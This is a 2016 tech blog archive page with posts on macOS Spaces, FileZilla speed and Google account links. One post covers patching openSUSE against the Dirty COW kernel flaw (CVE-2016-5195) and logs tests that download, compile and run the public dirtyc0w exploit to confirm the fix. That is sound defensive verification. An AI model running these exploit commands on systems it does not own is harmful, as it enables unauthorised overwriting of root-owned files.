The Wiert Corner – irregular stream of stuff

Jeroen W. Pluimers on .NET, C#, Delphi, databases, and personal interests

  • My badges

  • Twitter Updates

  • My Flickr Stream

    20140508-Delphi-2007--Project-Options--Cannot-Edit-Application-Title-HelpFile-Icon-Theming20140430-Fiddler-Filter-Actions-Button-Run-Filterset-now20140424-VMware-Fusion-6.0.3.-no-reclaimable
    More Photos

  • Pages

  • All categories

  • Enter your email address to subscribe to this blog and receive notifications of new posts by email.

    Join 2,224 other followers

Archive for October 21st, 2016

display – How can I move spaces between external monitors in Mavericks? – Ask Different

Posted by jpluimers on 2016/10/21

display – How can I move spaces between external monitors in Mavericks? – Ask Different [WayBack]

You can only move spaces which are non-active.

For example, lets say you have spaces 1 and 2. If space 1 is active, you can not move it. You first have to select space 2 then you can move space 1 to a different monitor.

This helped me work around version 8.35 of Microsoft Remote Desktop for OS X breaks second monitor usage [WayBack]:

  1. Double click a connection so it goes to a new space on the primary display
  2. Make the normal space active (by three finger swiping on the primary display)
  3. Go to mission control
  4. Move the non-active RDP space to the secondary monitor

Sometimes the primary monitor doesn’t have a non-active space any more so you have to create a new one in the top right of Mission Control [WayBack].

–jeroen

Posted in Apple, Mac, Mac OS X / OS X / MacOS, MacBook, MacBook Retina, MacBook-Pro, OS X 10.9 Mavericks, Power User, Remote Desktop Protocol/MSTSC/Terminal Services, Windows | Leave a Comment »

How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ]

Posted by jpluimers on 2016/10/21

There is a nasty (Dirty COW: CVE-2016-5195) Linux kernel bug with zero-day exploits floating around

OpenSuSE updates will be available soon (likely this weekend); from the  #openSUSE-factory IRC channel :

wiert: any E.T.A. for CVE-2016-5195 in the various releases?

_Marcus_: 13.1 and 42.1 i just released. 13.2 submission i am still awaiting, so release likely tomorrow

wiert: How about Tumbleweed?

DimStar: for TW, I have it in staging and will try to squeeze it into the 1021 snapshot
so unlike something really bad happened, it should be shipping tomorrow or Sunday

via: How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ] [WayBack]

Progress can be tracked at https://bugzilla.suse.com/show_bug.cgi?id=CVE-2016-5195 (via simotek a.k.a. Simon Lees at IRC). Hopefully 13.2 will get released on Monday.

Edit: 13.2 didn’t make it on monday. Progress can be found via https://build.opensuse.org/project/maintenance_incidents/openSUSE:Maintenance (slow loading page!) and is at https://build.opensuse.org/project/show/openSUSE:Maintenance:5752

More exploits at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

–jeroen

Testing 13.2:

# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
# zypper patch

This works fine in await of the formal update process and me testing it resulted in the release of the kernel to the official 13.2 update, but note you still have to reboot after the update even though the process doesn’t tell you that:

wiert: @_Marcus_ “klopt als een zwerende vinger” or in English: works splendid. install and test log at https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e
wiert: @_Marcus_ thanks about teaching me about `zypper patch`. Need to run for the fundraising event now.
_Marcus_: wiert: thanks :)
wiert: @_Marcus_ no problem. Given the work you guys (and gals?) do it’s a small thing with the added bonus of contributing to my motto “life is about learning new things every day”.
_Marcus_: after your feedback i have now released the kenel ;)
wiert: @_Marcus_ great, looking forward to the actual update later. Thanks a lot!
wiert: @_Marcus_ I’ve updated the gist: 13.2 plus official dirty-COW update needs reboot, but the update process doesn’t list about reboot. Didn’t get the full zypper output, but I after updating I did a before/after reboot comparison of the behaviour. Results in https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e#file-testing-official-update-before-reboot-then-reboot-retest-txt
# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
Adding repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' ……………………………………………………………………………………………………………………………………………………………………………..[done]
Repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' successfully added
Enabled : Yes
Autorefresh : No
GPG Check : Yes
URI : http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/
# zypper patch
New repository or package signing key received:
Repository: openSUSE:Maintenance:5752 (openSUSE_13.2_Update)
Key Name: openSUSE:Maintenance OBS Project <openSUSE:Maintenance@build.opensuse.org>
Key Fingerprint: 7C097045 B0D351D3 69AC453A 598D0E63 B3FD7E48
Key Created: Thu Aug 6 11:49:53 2015
Key Expires: Sat Oct 14 11:49:53 2017
Rpm Name: gpg-pubkey-b3fd7e48-55c32dc1
Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r): t
Building repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' cache ………………………………………………………………………………………………………………………………………………………………………[done]
Loading repository data…
Reading installed packages…
Resolving package dependencies…
The following NEW package is going to be installed:
kernel-default-3.16.7-45.1
The following NEW patch is going to be installed:
5752
1 new package to install.
Overall download size: 45.2 MiB. Already cached: 0 B After the operation, additional 213.5 MiB will be used.
Continue? [y/n/? shows all options] (y): y
Retrieving package kernel-default-3.16.7-45.1.x86_64 (1/1), 45.2 MiB (213.5 MiB unpacked)
Retrieving: kernel-default-3.16.7-45.1.x86_64.rpm ……………………………………………………………………………………………………………………………………………………………………………………[done (3.6 MiB/s)]
Checking for file conflicts: …………………………………………………………………………………………………………………………………………………………………………………………………………………[done]
(1/1) Installing: kernel-default-3.16.7-45.1 …………………………………………………………………………………………………………………………………………………………………………………………………..[done]
Additional rpm output:
warning: /var/cache/zypp/packages/openSUSE_Maintenance_5752/x86_64/kernel-default-3.16.7-45.1.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID b3fd7e48: NOKEY
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
Warning: One of installed patches requires reboot of your machine. Reboot as soon as possible.
# reboot

view raw
installing-patch.txt
hosted with ❤ by GitHub

(1/3) Installing: kernel-default-3.16.7-45.1 ……………………………………………………………………………………………….[done]
Additional rpm output:
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
(2/3) Installing: ghostscript-9.15-6.1 …………………………………………………………………………………………………….[done]
(3/3) Installing: ghostscript-x11-9.15-6.1 …………………………………………………………………………………………………[done]

view raw
tail-log-of-official-update.txt
hosted with ❤ by GitHub

$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su –
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap ffffffffffffffff
madvise -100000000
procselfmem -100000000
$ cat foo
cat: foo: No such file or directory
$ sudo su –
# cat foo
this is not a test
# logout

view raw
testing-after-reboot.txt
hosted with ❤ by GitHub

$ cd /tmp/
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su –
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f6ab7207000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
$ sudo su –
# reboot
login
$ cd /tmp/
$ sudo su –
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f5465983000
madvise 0
procselfmem 1800000000
$ cat foo
this is not a test

view raw
testing-official-update-before-reboot-then-reboot-retest.txt
hosted with ❤ by GitHub

Posted in *nix, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »

FileZilla on Windows is waaaay faster than WinSCP

Posted by jpluimers on 2016/10/21

Not sure why yet, but on a gigabit network between a Windows 2008 R2 Server and a Proxmox KVM machine, WinSCP gets around 10 megabit/second and FileZilla > 30 megabit/second.

Others seem to agree that filezilla faster than winscp.

–jeroen

Posted in Communications Development, Development, Internet protocol suite, Power User, Proxmox, SSH, TCP, Virtualization, VMware, Windows, Windows Server 2008, Windows Server 2008 R2 | 1 Comment »

Some Google URLs

Posted by jpluimers on 2016/10/21

Below a table with clickable links, details are in the Via at the end. I added some more beyond the 10 original ones.

# URL What
Footer 1 Footer 2 Footer 3
1 https://accounts.google.com/SignUpWithoutGmail Get a new account
2 https://www.google.com/ads/preferences Manage advertisement profile
3 https://www.google.com/takeout Download your Google data (mail can take days!)
4 https://support.google.com/legal To file a complaint about using copyrighted or unpermissioned material
5 https://maps.google.com/locationhistory Shows where your devices have been
6 https://history.google.com All your searches
7 https://www.google.com/settings/account/inactive Prevent extended inactivity, Google doesn’t delete your account after 9 months.
8 https://security.google.com/settings/security/activity When you suspect account abuse
9 https://security.google.com/settings/security/permissions Set permissions of apps and sites relating to your account
10 https://admin.google.com/example.org/VerifyAdminAccountPasswordReset Apps users: reset admin account by adding a CNAME to the DNS
11 https://plus.google.com G+ / Google Plus
12 https://plus.google.com/hangouts Google Hangouts
13 https://gmail.com GMail / Google Mail
14 https://contacts.google.com Google Contacts (note + button to add is hidden behind Hangouts pop-up also on the lower right)
15 https://calendar.google.com Calendar / Agenda
16 https://www.google.com/sync Sync Google Settings between various devices / applications
17 https://myaccount.google.com Account and privacy settings
18 https://myaccount.google.com/security Security settings like two-factor authentication (2-step signin)
19 https://security.google.com/settings/security/secureaccount Check if your security settings (recovery phone, recovery email, security question) are still up to date.
20 https://myaccount.google.com/privacycheckup/1 Setting your privacy
21 https://wallet.google.com Manage Wallet
22 https://play.google.com Google Play Store and settings
23 https://www.google.com/android/devicemanager Where is your Android device
# href what
# href what
# href what
# href what
# href what
# href what
# href what
# href what
# href what
# href what
# href what

–jeroen

via: Some Imporatant URLs you should know as a Google User – I am Programmer.

Posted in GMail, Google, Power User | Leave a Comment »

 
%d bloggers like this: